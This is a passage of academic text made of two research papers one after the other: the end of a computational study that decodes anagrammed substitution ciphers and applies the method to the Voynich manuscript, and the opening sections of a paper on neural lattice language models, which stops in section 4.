but also with three and otter, because all these words map to the (2, 1, 1, 1) pat- tern. Internally, we represent all words as alpha- grams, in which letters are reshuffled into the alpha- betical order (Figure 3d). In order to handle the in- creased ambiguity, we use a letter-frequency heuris- tic to select the most likely mapping of letters within an n-gram. The trigram language models over both words and characters are derived by converting each word in the training corpus into its alphagram. On a benchmark set of 50 ciphers of length 256, the av- erage error rate of the modified solver is 2.6%, with only a small increase in time and space usage. 4.2 Anagram Decoder The output of the script decipherment step is gener- ally unreadable (see Figure 3d). The words might be composed of the right letters but their order is unlikely to be correct. We proceed to decode the sequence of anagrams by framing it as a simple hid- den Markov model, in which the hidden states corre- spond to plaintext words, and the observed sequence is composed of their anagrams. Without loss of gen- erality, we convert anagrams into alphagrams, so that the emission probabilities are always equal to 1. Any alphagrams that correspond to unseen words are replaced with a single ‘unknown’ type. We then use a modified Viterbi decoder to determine the most likely word sequence according to a word trigram language model, which is derived from the train- ing corpus, and smoothed using deleted interpola- tion (Jelinek and Mercer, 1980). 4.3 Vowel Recovery Many writing systems, including Arabic and He- brew, are abjads that do not explicitly represent vow- els. Reddy and Knight (2011) provide evidence that the VMS may encode an abjad. The removal of vowels represents a substantial loss of information, 80 and appears to dramatically increase the difficulty of solving a cipher. In order to apply our system to abjads, we re- move all vowels in the corpora prior to deriving the language models used by the script decipherment step. We assume the ability to partition the plaintext symbols into disjoint sets of vowels and consonants for each candidate language. The anagram decoder is trained to recover complete in-vocabulary words from sequences of anagrams containing only conso- nants. At test time, we remove the vowels from the input to the decipherment step of the pipeline. In contrast with Knight et al. (2006), our approach is able not only to attack abjad ciphers, but also to re- store the vowels, producing fully readable text. 4.4 Evaluation In order to test our anagram decryption pipeline on out-of-domain ciphertexts, the corpora for deriving language models need to be much larger than the UDHR samples used in the previous section. We selected five diverse European languages from Eu- roparl (Koehn, 2005): English, Bulgarian, German, Greek, and Spanish. The corresponding corpora contain about 50 million words each, with the excep- tion of Bulgarian which has only 9 million words. We remove punctuation and numbers, and lowercase all text. We test on texts extracted from Wikipedia articles on art, Earth, Europe, film, history, language, music, science, technology, and Wikipedia. The texts are first enciphered using a substitution cipher, and then anagrammed (Figure 3a-c). Each of the five lan- guages is represented by 10 ciphertexts, which are decrypted independently. In order to keep the run- ning time reasonable, the length of the ciphertexts is set to 500 characters. The first step is language identification. Our de- composition pattern method, which is resistant to both anagramming and substitution, correctly iden- tifies the source language of 49 out of 50 cipher- texts. The lone exception is the German article on technology, for which German is the second ranked language after Greek. This error could be easily de- tected by noticing that most of the Greek words “de- ciphered” by the subsequent steps are out of vocab- ulary. We proceed to evaluate the following steps assuming that the source language is known. Step 2 Step 3 Both Ceiling English 99.5 98.2 97.7 98.7 Bulgarian 97.0 94.7 91.9 95.3 German 97.3 90.6 88.7 91.8 Greek 95.7 96.6 92.7 97.2 Spanish 99.1 98.0 97.1 99.0 Average 97.7 95.7 93.8 96.5 Table 2: Word accuracy on the anagram decryption task. The results in Table 2 show that our system is able to effectively break the anagrammed ciphers in all five languages. For Step 2 (script decipherment), we count as correct all word tokens that contain the right characters, disregarding their order. Step 3 (ana- gram decoding) is evaluated under the assumption that it has received a perfect decipherment from Step 2. On average, the accuracy of each individual step exceeds 95%. The values in the column denoted as Both are the actual results of the pipeline composed of Steps 2 and 3. Our system correctly recovers 93.8% of word tokens, which corresponds to over 97% of the in-vocabulary words within the test files, The percentage of the in-vocabulary words, which are shown in the Ceiling column, constitute the ef- fective accuracy limits for each language. The errors fall into three categories, as illustrated in Figure 3e. Step 2 introduces decipherment errors (e.g., deciphering ‘s’ as ‘k’ instead of ‘z’ in “orga- nized”), which typically preclude the word from be- ing recovered in the next step. A decoding error in Step 3 may occur when an alphagram corresponds to multiple words (e.g. “greens” instead of “gen- res”), although most such ambiguities are resolved correctly. However, the majority of errors are caused by out-of-vocabulary (OOV) words in the plaintext (e.g., “improvisational”). Since the decoder can only produce words found in the training corpus, an OOV word almost always results in an error. The German ciphers stand out as having the largest percentage of OOV words (8.2%), which may be attributed to fre- quent compounding. Table 3 shows the results of the analogous exper- iments on abjads (Section 4.3). Surprisingly, the removal of vowels from the plaintext actually im- proves the average decipherment step accuracy to 99%. This is due not only to the reduced number of 81 Step 2 Step 3 Both Ceiling English 99.9 84.6 84.5 98.7 Bulgarian 99.1 71.1 70.4 95.0 German 98.5 73.7 72.9 91.8 Greek 97.7 65.4 63.6 97.0 Spanish 99.8 73.7 73.3 99.0 Average 99.0 73.8 73.1 96.4 Table 3: Word accuracy on the abjad anagram decryption task. distinct symbols, but also to the fewer possible ana- gramming permutations in the shortened words. On the other hand, the loss of vowel information makes the anagram decoding step much harder. However, more than three quarters of in-vocabulary tokens are still correctly recovered, including the original vow- els.3 In general, this is sufficient for a human reader to understand the meaning of the document, and de- duce the remaining words. 5 Voynich Experiments In this section, we present the results of our experi- ments on the VMS. We attempt to identify the source language with the methods described in Section 3; we quantify the similarity of the Voynich words to alphagrams; and we apply our anagram decryption algorithm from Section 4 to the text. 5.1 Data Unless otherwise noted, the VMS text used in our experiments corresponds to 43 pages of the manuscript in the “type B” handwriting (VMS-B), investigated by Reddy and Knight (2011), which we obtained directly from the authors. It con- tains 17,597 words and 95,465 characters, tran- scribed into 35 characters of the Currier alphabet (d’Imperio, 1978). For the comparison experiments, we selected five languages shown in Table 4, which have been suggested in the past as the language of the VMS (Kennedy and Churchill, 2006). Consider- ing the age of the manuscript, we attempt to use corpora that correspond to older versions of the languages, including King James Bible, Bibbia di Gerusalemme, and Vulgate. 3The differences in the Ceiling numbers between Tables 2 and 3 are due to words that are composed entirely of vowels. Language Text Words Characters English Bible 804,875 4,097,508 Italian Bible 758,854 4,246,663 Latin Bible 650,232 4,150,533 Hebrew Tanach 309,934 1,562,591 Arabic Quran 78,245 411,082 Table 4: Language corpora. 5.2 Source Language In this section, we present the results of our cipher- text language identification methods from Section 3 on the VMS text. The closest language according to the letter fre- quency method is Mazatec, a native American lan- guage from southern Mexico. Since the VMS was created before the voyage of Columbus, a New World language is an unlikely candidate. The top ten languages also include Mozarabic (3), Italian (8), and Ladino (10), all of which are plausible guesses. However, the experiments in Section 3.4 demon- strate that the frequency analysis is much less reli- able than the other two methods. The top-ranking languages according to the de- composition pattern method are Hebrew, Malay (in Arabic script), Standard Arabic, and Amharic, in this order. We note that three of these belong to the Semitic family. The similarity of decomposition patterns between Hebrew and the VMS is striking. The Bhattacharyya distance between the respective distributions is 0.020, compared to 0.048 for the second-ranking Malay. The histogram in Figure 4 shows Hebrew as a single outlier in the leftmost bin. In fact, Hebrew is closer to a sample of the VMS of a similar length than to any of the remaining 379 UDHR samples. The ranking produced by the the trial decipher- ment method is sensitive to parameter changes; how- ever, the two languages that consistently appear near the top of the list are Hebrew and Esperanto. The high rank of Hebrew corroborates the outcome of the decomposition pattern method. Being a relatively recent creation, Esperanto itself can be excluded as the ciphertext language, but its high score is remark- able in view of the well-known theory that the VMS text represents a constructed language.4 We hypoth- 4The theory was first presented in the form of an ana- 82 Figure 4: Histogram of distances between the VMS and samples of 380 other languages, as determined by the de- composition pattern method. The single outlier on the left is Hebrew. esize that the extreme morphological regularity of Esperanto (e.g., all plural nouns contain the bigram ‘oj’) yields an unusual bigram character language model which fits the repetitive nature of the VMS words. In summary, while there is no complete agree- ment between the three methods about the most likely underlying source language, there appears to be a strong statistical support for Hebrew from the two most accurate methods, one of which is robust against anagramming. In addition, the language is a plausible candidate on historical grounds, being widely-used for writing in the Middle Ages. In fact, a number of cipher techniques, including anagram- ming, can be traced to the Jewish Cabala (Kennedy and Churchill, 2006). 5.3 Alphagrams In this section, we quantify the peculiarity of the VMS lexicon by modeling the words as alphagrams. We introduce the notion of the alphagram distance, and compute it for the VMS and for natural language samples. We define a word’s alphagram distance with re- spect to an ordering of the alphabet as the number of letter pairs that are in the wrong order. For example, with respect to the QWERTY keyboard order, the word rye has an alphagram distance of 2 because it contains two letter pairs that violate the order: (r, e) and (y, e). A word is an alphagram if and only if its alphagram distance is zero. The maximum alpha- gram distance for a word of length n is equal to the number of its distinct letter pairs. gram (Friedman and Friedman, 1959). See also a more recent proposal by Balandin and Averyanov (2014). In order to quantify how strongly the words in a language resemble alphagrams, we first need to identify the order of the alphabet that minimizes the total alphagram distance of a representative text sample. The decision version of this problem is NP- complete, which can be demonstrated by a reduc- tion from the path variant of the traveling salesman problem. Instead, we find an approximate solution with the following greedy search algorithm. Starting from an initial order in which the letters first occur in the text, we repeatedly consider all possible new positions for a letter within the current order, and choose the one that yields the lowest total alphagram distance of the text. This process is repeated until no better order is found for 10 iterations, with 100 ran- dom restarts. When applied to a random sample of 10,000 word tokens from the VMS, our algorithm yields the or- der 4BZOVPEFSXQYWC28ARUTIJ3*GHK69MDLN5, which corresponds to the average alphagram dis- tance of 0.996 (i.e., slightly less than one pair of let- ters per word). The corresponding result on English is jzbqwxcpathofvurimslkengdy, with an average alphagram distance of 2.454. Note that the letters at the beginning of the sequence tend to have low frequency, while the ones at the end occur in popular morphological suffixes, such as −ed and −ly. For example, the beginning of the first arti- cle of the UDHR with the letters transposed to fol- low this order becomes: “All ahumn biseng are born free and qaule in tiingdy and thrisg.” To estimate how close the solution produced by our greedy algorithm is to the actual optimal solu- tion, we also calculate a lower bound for the total alphagram distance with any character order. The lower bound is ∑ x,y min(bxy, byx), where bxy is the number of times character x occurs before character y within words in the text. Figure 5 shows the average alphagram distances for the VMS and five comparison languages, each represented by a random sample of 10,000 word to- kens which exclude single-letter words. The Ex- pected values correspond to a completely random intra-word letter order. The Lexicographic values correspond to the standard alphabetic order in each language. The actual minimum alphagram distance is between the Lower Bound and the Computed Min- imum obtained by our greedy algorithm. 83 Figure 5: Average word alphagram distances. The results in Figure 5 show that while the ex- pected alphagram distance for the VMS falls within the range exhibited by natural languages, its mini- mum alphagram distance is exceptionally low. In absolute terms, the VMS minimum is less than half the corresponding number for Hebrew. In relative terms, the ratio of the expected distance to the min- imum distance is below 2 for any of the five lan- guages, but above 4 for the VMS. These results sug- gest that, if the VMS encodes a natural language text, the letters within the words may have been re- ordered during the encryption process. 5.4 Decipherment Experiments In this section, we discuss the results of applying our anagram decryption system described in Section 4 to the VMS text. We decipher each of the first 10 pages of the VMS-B using the five language models derived from the corpora described in Section 5.1. The pages con- tain between 292 and 556 words, 3726 in total. Fig- ure 6 shows the average percentage of in-vocabulary words in the 10 decipherments. The percentage is significantly higher for Hebrew than for the other languages, which suggests a better match with the VMS. Although the abjad versions of English, Ital- ian, and Latin yield similar levels of in-vocabulary words, their distances to the VMS language accord- ing to the decomposition pattern method are 0.159, 0.176, and 0.245 respectively, well above Hebrew’s 0.020. None of the decipherments appear to be syntac- tically correct or semantically consistent. This is expected because our system is designed for pure monoalphabetic substitution ciphers. If the VMS indeed represents one of the five languages, the amount of noise inherent in the orthography and the transcription would prevent the system from pro- ducing a correct decipherment. For example, in a hypothetical non-standard orthography of Hebrew, some prepositions or determiners could be written as separate one-letter words, or a single phoneme could have two different representations. In addi- tion, because of the age of the manuscript and the variety of its hand-writing styles, any transcription requires a great deal of guesswork regarding the separation of individual words into distinct symbols (Figure 1). Finally, the decipherments necessarily reflect the corpora that underlie the language model, which may correspond to a different domain and his- torical period. Nevertheless, it is interesting to take a closer look at specific examples of the system output. The first line of the VMS (VAS92 9FAE AR APAM ZOE ZOR9 QOR92 9 FOR ZOE89) is deciphered into Hebrew as אנשיו עלי ו לביחו אליו איש Nהכה לה ועשה 5.המצות According to a native speaker of the lan- guage, this is not quite a coherent sentence. How- ever, after making a couple of spelling corrections, Google Translate is able to convert it into passable English: “She made recommendations to the priest, man of the house and me and people.” 6 Even though the input ciphertext is certainly too noisy to result in a fluent output, the system might still manage to correctly decrypt individual words in a longer passage. In order to limit the influence of context in the decipherment, we restrict the word language model to unigrams, and apply our sys- tem to the first 72 words (241 characters)7 from the “Herbal” section of the VMS, which contains draw- ings of plants. An inspection of the output reveals several words that would not be out of place in a me- dieval herbal, such as הצר ‘narrow’, איכר ‘farmer’, אור ‘light’, אויר ‘air’, אׁש ‘fire’. The results presented in this section could be in- terpreted either as tantalizing clues for Hebrew as 5Hebrew is written from right to left. 6https://translate.google.com/ (accessed Nov. 20, 2015). 7The length of the passage was chosen to match the number of symbols in the Phaistos Disc inscription. 84 Figure 6: Average percentage of in-vocabulary words in the decipherments of the first ten pages of the VMS. the source language of the VMS, or simply as ar- tifacts of the combinatorial power of anagramming and language models. We note that the VMS deci- pherment claims in the past have typically been lim- ited to short passages, without ever producing a full solution. In any case, the output of an algorithmic decipherment of a noisy input can only be a starting point for scholars that are well-versed in the given language and historical period. 6 Conclusion We have presented a multi-stage system for solv- ing ciphers that combine monoalphabetic letter sub- stitution and unconstrained intra-word letter trans- position to encode messages in an unknown lan- guage.8 We have evaluated three methods of cipher- text language identification that are based on letter frequency, decomposition patterns, and trial deci- pherment, respectively. We have demonstrated that our language-independent approach can effectively break anagrammed substitution ciphers, even when vowels are removed from the input. The application of our methods to the Voynich manuscript suggests that it may represent Hebrew, or another abjad script, with the letters rearranged to follow a fixed order. There are several possible directions for the future work. The pipeline approach presented in this pa- per might be outperformed by a unified generative model. The techniques could be made more resis- tant to noise; for example, by softening the emission model in the anagram decoding phase. It would also be interesting to jointly identify both the language and the type of the cipher (Nuhn and Knight, 2014), 8Software at https://www.cs.ualberta.ca/˜kondrak/. which could lead to the development of methods to handle more complex ciphers. Finally, the anagram decoding task could be extended to account for the transposition of words within lines, in addition to the transposition of symbols within words. Acknowledgements We thank Prof. Moshe Koppel for the assessment of the Hebrew examples. We thank the reviewers for their comments and suggestions. This research was supported by the Natural Sci- ences and Engineering Research Council of Canada, and by Alberta Innovates – Technology Futures and Alberta Innovation & Advanced Education. References Arcady Balandin and Sergey Averyanov. 2014. The Voynich manuscript: New approaches to deciphering via a constructed logical language. A. Bhattacharyya. 1943. On a measure of divergence be- tween two statistical populations defined by their prob- ability distributions. Bull. Calcutta Math. Soc., 35:99– 109. Mary E. d’Imperio. 1978. The Voynich manuscript: An elegant enigma. Technical report, DTIC Document. Guy Emerson, Liling Tan, Susanne Fertmann, Alexis Palmer, and Michaela Regneri. 2014. Seedling: Building and using a seed corpus for the human lan- guage project. In Workshop on the Use of Computa- tional Methods in the Study of Endangered Languages, pages 77–85. Joseph Martin Feely. 1943. Roger Bacon’s Cypher. The Right Key Found. Rochester, NY. William F. Friedman and Elizebeth S. Friedman. 1959. Acrostics, anagrams, and Chaucer. Philological Quar- terly, 38(1):1–20. Bradley Hauer, Ryan Hayward, and Grzegorz Kondrak. 2014. Solving substitution ciphers with combined lan- guage models. In COLING, pages 2314–2325. Grzegorz Jaskiewicz. 2011. Analysis of letter frequency distribution in the Voynich manuscript. In Interna- tional Workshop on Concurrency, Specification and Programming (CS&P’11), pages 250–261. Frederick Jelinek and Robert L. Mercer. 1980. Inter- polated estimation of Markov source parameters from sparse data. Pattern recognition in practice. Gerry Kennedy and Rob Churchill. 2006. The Voynich manuscript: The mysterious code that has defied inter- pretation for centuries. Inner Traditions/Bear & Co. 85 Kevin Knight, Anish Nair, Nishit Rathod, and Kenji Ya- mada. 2006. Unsupervised analysis for decipherment problems. In COLING/ACL, pages 499–506. Kevin Knight, Beáta Megyesi, and Christiane Schaefer. 2011. The Copiale cipher. In 4th Workshop on Build- ing and Using Comparable Corpora: Comparable Corpora and the Web, pages 2–9. Philipp Koehn. 2005. Europarl: A parallel corpus for sta- tistical machine translation. In MT Summit, volume 5, pages 79–86. Gabriel Landini. 2001. Evidence of linguistic struc- ture in the Voynich manuscript using spectral analysis. Cryptologia, 25(4):275–295. John Matthews Manly. 1931. Roger Bacon and the Voynich MS. Speculum, 6(03):345–391. Marcelo A. Montemurro and Damián H. Zanette. 2013. Keywords and co-occurrence patterns in the Voynich manuscript: An information-theoretic analysis. PloS one, 8(6):e66344. George Nagy, Sharad Seth, and Kent Einspahr. 1987. Decoding substitution ciphers by means of word matching with application to OCR. IEEE Transac- tions on Pattern Analysis and Machine Intelligence, 9(5):710–715. William Romaine Newbold and Roland Grubb Kent. 1928. The Cipher of Roger Bacon. University of Pennsylvania Press. Peter Norvig. 2009. Natural language corpus data. In Toby Segaran and Jeff Hammerbacher, editors, Beau- tiful data: The stories behind elegant data solutions. O’Reilly. Malte Nuhn and Kevin Knight. 2014. Cipher type detec- tion. In EMNLP, pages 1769–1773. Sujith Ravi and Kevin Knight. 2008. Attacking deci- pherment problems optimally with low-order n-gram models. In EMNLP, pages 812–819. Sujith Ravi and Kevin Knight. 2009. Learning phoneme mappings for transliteration without parallel data. In NAACL, pages 37–45. Sravana Reddy and Kevin Knight. 2011. What we know about the Voynich manuscript. In 5th ACL-HLT Work- shop on Language Technology for Cultural Heritage, Social Sciences, and Humanities, pages 78–86. Andrew Robinson. 2002. Lost languages: The enigma of the world’s undeciphered scripts. McGraw-Hill. Gordon Rugg. 2004. An elegant hoax? A possible solution to the Voynich manuscript. Cryptologia, 28(1):31–46. Andreas Schinner. 2007. The Voynich manuscript: Evi- dence of the hoax hypothesis. Cryptologia, 31(2):95– 107. Klaus Schmeh. 2013. A milestone in Voyn- ich manuscript research: Voynich 100 conference in Monte Porzio Catone, Italy. Cryptologia, 37(3):193– 203. Simon Singh. 2011. The code book: The science of secrecy from ancient Egypt to quantum cryptography. Anchor. Leonell C Strong. 1945. Anthony Askham, the author of the Voynich manuscript. Science, 101(2633):608– 609. John Tiltman. 1968. The Voynich Manuscript, The Most Mysterious Manuscript in the World. Baltimore Bib- liophiles. 86 work_ic6cztnzvrhobibxk37oqugbma ---- Neural Lattice Language Models Jacob Buckman Language Technologies Institute Carnegie Mellon University jacobbuckman@gmail.com Graham Neubig Language Technologies Institute Carnegie Mellon University gneubig@cs.cmu.edu Abstract In this work, we propose a new language mod- eling paradigm that has the ability to perform both prediction and moderation of informa- tion flow at multiple granularities: neural lat- tice language models. These models con- struct a lattice of possible paths through a sen- tence and marginalize across this lattice to cal- culate sequence probabilities or optimize pa- rameters. This approach allows us to seam- lessly incorporate linguistic intuitions – in- cluding polysemy and the existence of multi- word lexical items – into our language model. Experiments on multiple language modeling tasks show that English neural lattice language models that utilize polysemous embeddings are able to improve perplexity by 9.95% rela- tive to a word-level baseline, and that a Chi- nese model that handles multi-character to- kens is able to improve perplexity by 20.94% relative to a character-level baseline. 1 Introduction Neural network models have recently contributed to- wards a great amount of progress in natural language processing. These models typically share a common backbone: recurrent neural networks (RNN), which have proven themselves to be capable of tackling a variety of core natural language processing tasks (Hochreiter and Schmidhuber, 1997; Elman, 1990). One such task is language modeling, in which we estimate a probability distribution over sequences of tokens that corresponds to observed sentences (§2). Neural language models, particularly models con- ditioned on a particular input, have many applica- tions including in machine translation (Bahdanau et al., 2016), abstractive summarization (Chopra et al., 2016), and speech processing (Graves et al., 2013). dogs chased the small cat dogs chased the small cat dogs chased the small dogs chased the the_small the_small_cat small_cat dogs_chasedchased chased_the dogs_chased_the chased_the_small Figure 1: Lattice decomposition of a sentence and its cor- responding lattice language model probability calculation Similarly, state-of-the-art language models are al- most universally based on RNNs, particularly long short-term memory (LSTM) networks (Jozefowicz et al., 2016; Inan et al., 2017; Merity et al., 2016). While powerful, LSTM language models usually do not explicitly model many commonly-accepted linguistic phenomena. As a result, standard mod- els lack linguistically informed inductive biases, po- tentially limiting their accuracy, particularly in low- data scenarios (Adams et al., 2017; Koehn and Knowles, 2017). In this work, we present a novel modification to the standard LSTM language mod- eling framework that allows us to incorporate some varieties of these linguistic intuitions seamlessly: neural lattice language models (§3.1). Neural lat- tice language models define a lattice over possi- ble paths through a sentence, and maximize the marginal probability over all paths that lead to gen- erating the reference sentence, as shown in Fig. 1. Depending on how we define these paths, we can in- corporate different assumptions about how language should be modeled. In the particular instantiations of neural lattice language models covered by this paper, we focus on two properties of language that could potentially be of use in language modeling: the existence of multi- word lexical units (Zgusta, 1967) (§4.1) and poly- 529 Transactions of the Association for Computational Linguistics, vol. 6, pp. 529–541, 2018. Action Editor: Holger Schwenk. Submission batch: 8/2017; Revision batch: 1/2018; Published 8/2018. c©2018 Association for Computational Linguistics. Distributed under a CC-BY 4.0 license. semy (Ravin and Leacock, 2000) (§4.2). Neural lat- tice language models allow the model to incorporate these aspects in an end-to-end fashion by simply ad- justing the structure of the underlying lattices. We run experiments to explore whether these modifications improve the performance of the model (§5). Additionally, we provide qualitative visualiza- tions of the model to attempt to understand what types of multi-token phrases and polysemous em- beddings have been learned. 2 Background 2.1 Language Models Consider a sequence X for which we want to cal- culate its probability. Assume we have a vocabulary from which we can select a unique list of |X| tokens x1,x2, . . . ,x|X| such that X = [x1;x2; . . . ;x|X|], i.e. the concatenation of the tokens (with an appro- priate delimiter). These tokens can be either on the character level (Hwang and Sung, 2017; Ling et al., 2015) or word level (Inan et al., 2017; Merity et al., 2016). Using the chain rule, language models gen- erally factorize p(X) in the following way: p(X) = p(x1,x2, . . . ,x|X|) = |X|∏ t=1 p(xt | x1,x2, . . . ,xt−1). (1) Note that this factorization is exact only in the case where the segmentation is unique. In character- level models, it is easy to see that this property is maintained, because each token is unique and non- overlapping. In word-level models, this also holds, because tokens are delimited by spaces, and no word contains a space. 2.2 Recurrent Neural Networks Recurrent neural networks have emerged as the state-of-the-art approach to approximating p(X). In particular, the LSTM cell (Hochreiter and Schmid- huber, 1997) is a specific RNN architecture which has been shown to be effective on many tasks, in- cluding language modeling (Press and Wolf, 2017; Jozefowicz et al., 2016; Merity et al., 2016; Inan et al., 2017).1 LSTM language models recursively cal- 1In this work, we utilize an LSTM with linked input and forget gates, as proposed by Greff et al. (2016). culate the hidden and cell states (ht and ct respec- tively) given the input embedding et−1 correspond- ing to token xt−1: ht,ct = LSTM(ht−1,ct−1,et−1,θ), (2) then calculate the probability of the next token given the hidden state, generally by performing an affine transform parameterized by W and b, followed by a softmax: p(xt | ht) := softmax(W ∗ht + b). (3) 3 Neural Lattice Language Models 3.1 Language Models with Ambiguous Segmentations To reiterate, the standard formulation of language modeling in the previous section requires splitting sentence X into a unique set of tokens x1, . . . ,x|X|. Our proposed method generalizes the previous for- mulation to remove the requirement of uniqueness of segmentation, similar to that used in non-neural n-gram language models such as Dupont and Rosen- feld (1997) and Goldwater et al. (2007). First, we define some terminology. We use the term “token”, designated by xi, to describe any in- divisible item in our vocabulary that has no other vocabulary item as its constituent part. We use the term “chunk”, designated by ki or x j i , to describe a sequence of one or more tokens that represents a portion of the full string X, containing the unit to- kens xi through xj: x j i = [xi,xi+1; . . . ;xj]. We also refer to the “token vocabulary”, which is the subset of the vocabulary containing only tokens, and to the “chunk vocabulary”, which similarly contains all chunks. Note that we can factorize the probability of any sequence of chunks K using the chain rule, in pre- cisely the same way as sequences of tokens: p(K) = p(k1,k2, . . . ,k|K|) = |K|∏ t=1 p(kt | k1,k2, . . . ,kt−1). (4) We can factorize the overall probability of a to- ken list X in terms of its chunks by using the chain rule, and marginalizing over all segmentations. For any particular token list X, we define a set of valid 530 segmentations S(X), such that for every sequence s ∈ S(X), X = [xs1−1s0 ;x s2−1 s1 ; . . . ;x s|s| s|s|−1]. The factorization is: p(X) = ∑ S p(X,S) = ∑ S p(X|S)p(S) = ∑ S∈S(X) p(S) = ∑ S∈S(X) |S|∏ t=1 p(xst−1st−1 | x s1−1 s0 ,xs2−1s1 , . . . ,x st−1−1 st−2 ). (5) Note that, by definition, there exists a unique seg- mentation of X such that x1,x2, . . . are all tokens, in which case |S| = |X|. When only that one unique segmentation is allowed per X, S contains only that one element, so summation drops out, and therefore for standard character-level and word-level models, Eq. (5) reduces to Eq. (4), as desired. However, for models that license multiple segmentations per X, computing this marginalization directly is gener- ally intractable. For example, consider segmenting a sentence using a vocabulary containing all words and all 2-word expressions. The size of S would grow exponentially with the number of words in X, meaning we would have to marginalize over tril- lions of unique segmentations for even modestly- sized sentences. 3.2 Lattice Language Models To avoid this, it is possible to re-organize the com- putations in a lattice, which allows us to dramati- cally reduce the number of computations required (Dupont and Rosenfeld, 1997; Neubig et al., 2010). All segmentations of X can be expressed as the edges of paths through a lattice over token-level pre- fixes of X: x<1,x<2, . . . ,X. The infimum is the empty prefix x<1; the supremum is X; an edge from prefix x<i to prefix x<j exists if and only if there exists a chunk xji in our chunk vocabulary such that [x<i;x j i ] = x<j. Each path through the lattice from x<1 to X is a segmentation of X into the list of to- kens on the traversed edges, as seen in Fig. 1. The probability of a specific prefix p(x<j) is calculated by marginalizing over all segmentations leading up to xj−1 p(x<j) = ∑ S∈S(x<j) |S|∏ t=1 p(xst−1st−1 | x<st−1), (6) where by definition s|S| = j. The key insight here that allows us to calculate this efficiently is that this is a recursive formula and that instead of marginaliz- ing over all segmentations, we can marginalize over immediate predecessor edges in the lattice, Aj. Each item in Aj is a location i (= st−1), which indicates that the edge between prefix x<i and prefix x<j, cor- responding to token xji , exists in the lattice. We can thus calculate p(x<j) as p(x<j) = ∑ i∈Aj p(x<i)p(x j i | x<i). (7) Since X is the supremum prefix node, we can use this formula to calculate p(X) by setting j = |X|. In order to do this, we need to calculate the proba- bility of each of its |X| predecessors. Each of those takes up to |X| calculations, meaning that the com- putation for p(X) can be done in O(|X|2) time. If we can guarantee that each node will have a maxi- mum number of incoming edges D so that |Aj| ≤ D for all j, then this bound can be reduced to O(D|X|) time.2 The proposed technique is completely agnostic to the shape of the lattice, and Fig. 2 illustrates several potential varieties of lattices. Depending on how the lattice is constructed, this approach can be useful in a variety of different contexts, two of which we dis- cuss in §4. 3.3 Neural Lattice Language Models There is still one missing piece in our attempt to ap- ply neural language models to lattices. Within our overall probability in Eq. (7), we must calculate the probability p(xji | x<i) of the next segment given the history. However, given that there are potentially an exponential number of paths through the lattice leading to xi, this is not as straightforward as in the case where only one segmentation is possible. Pre- vious work on lattice-based language models (Neu- big et al., 2010; Dupont and Rosenfeld, 1997) uti- lized count-based n-gram models, which depend on only a limited historical context at each step mak- ing it possible to compute the marginal probabilities in an exact and efficient manner through dynamic programming. On the other hand, recurrent neural 2Thus, the standard token-level language model where D = 1 takes O(|X|) computations. 531 the dog barked . the dog barked . the dog dog barked . the dog barked . the dog dog barked barked . the dog1 barked1 . dog2 barked2 (a) (b) (c) (d) Figure 2: Example of (a) a single-path lattice, (b) a sparse lattice, (c) a dense lattice with D = 2, and (d) a multilat- tice with D = 2, for sentence “the dog barked .” models depend on the entire context, causing them to lack this ability. Our primary technical contribu- tion is therefore to describe several techniques for incorporating lattices into a neural framework with infinite context, by providing ways to approximate the hidden state of the recurrent neural net. 3.3.1 Direct Approximation One approach to approximating the hidden state is the TreeLSTM framework described by Tai et al. (2015).3 In the TreeLSTM formulation, new states are derived from multiple predecessors by simply summing the individual hidden and cell state vec- tors of each of them. For each predecessor location i ∈ Aj, we first calculate the local hidden state h̃ and local cell state c̃ by combining the embedding e j i with the hidden state of the LSTM at x<i using the standard LSTM update function as in Eq. (2): h̃i, c̃i = LSTM(hi,ci,e j i,θ) for i ∈ Aj. We then sum the local hidden and cell states: hj = ∑ i∈Aj h̃i cj = ∑ i∈Aj c̃i. 3This framework has been used before for calculating neural sentence representations involving lattices by Su et al. (2016) and Sperber et al. (2017), but not for the language models that are the target of this paper. This formulation is powerful, but comes at the cost of sacrificing the probabilistic interpretation of which paths are likely. Therefore, even if almost all of the probability mass comes through the “true” segmentation, the hidden state may still be heavily influenced by all of the “bad” segmentations as well. 3.3.2 Monte-Carlo Approximation Another approximation that has been proposed is to sample one predecessor state from all possible predecessors, as seen in Chan et al. (2017). We can calculate the total probability that we reach some prefix x<j, and we know how much of this prob- ability comes from each of its predecessors in the lattice, so we can construct a probability distribution over predecessors in the lattice: M(x<i | θ) = p(x<i | θ)p(xji | x<i;θ) p(x<j | θ) . (8) Therefore, one way to update the LSTM is to sam- ple one predecessor x<i from the distribution M and simply set hj = h̃i and cj = c̃i. However, sampling is unstable and difficult to train: we found that the model tended to over-sample short tokens early on during training, and thus segmented every sentence into unigrams. This is similar to the outcome re- ported by Chan et al. (2017), who accounted for it by incorporating an � encouraging exploration. 3.3.3 Marginal Approximation In another approach, which allows us to incorpo- rate information from all predecessors while main- taining a probabilistic interpretation, we can utilize the probability distribution M to instead calculate the expected value of the hidden state: hj = Ex<i∼M[h̃i] = ∑ i∈Aj M(x<i | θ)h̃i cj = Ex<i∼M[c̃i] = ∑ i∈Aj M(x<i | θ)c̃i. 3.3.4 Gumbel-Softmax Interpolation The Gumbel-Softmax trick, or concrete distribu- tion, described by Jang et al. (2017) and Maddi- son et al. (2017), is a technique for incorporating discrete choices into differentiable neural computa- tions. In this case, we can use it to select a prede- cessor. The Gumbel-Softmax trick works by taking advantage of the fact that adding Gumbel noise to 532 the pre-softmax predecessor scores and then taking the argmax is equivalent to sampling from the prob- ability distribution. By replacing the argmax with a softmax function scaled by a temperature τ, we can get this pseudo-sampled distribution through a fully differentiable computation: N(x<i | θ) = exp((log(M(x<i | θ)) + gi)/τ)∑ k∈Aj exp((log(M(x<k | θ)) + gk)/τ) . This new distribution can then be used to calculate the hidden state by taking a weighted average of the states of possible predecessors: hj = j−1∑ i∈Aj N(x<i | θ)h̃i cj = j−1∑ i=j−L N(x<i | θ)c̃i. When τ is large, the values of N(x<i | θ) are flattened out; therefore, all the predecessor hidden states are summed with approximately equal weight, equivalent to the direct approximation (§3.3.1). On the other hand, when τ is small, the output distri- bution becomes extremely peaky, and one predeces- sor receives almost all of the weight. Each prede- cessor x<i has a chance of being selected equal to M(x<i | θ), which makes it identical to ancestral sampling (§3.3.2). By slowly annealing the value of τ, we can smoothly interpolate between these two approaches, and end up with a probabilistic interpre- tation that avoids the instability of pure sampling- based approaches. 4 Instantiations of Neural Lattice LMs In this section, we introduce two instantiations of neural lattice languages models aiming to capture features of language: the existence of coherent multi-token chunks, and the existence of polysemy. 4.1 Incorporating Multi-Token Phrases 4.1.1 Motivation 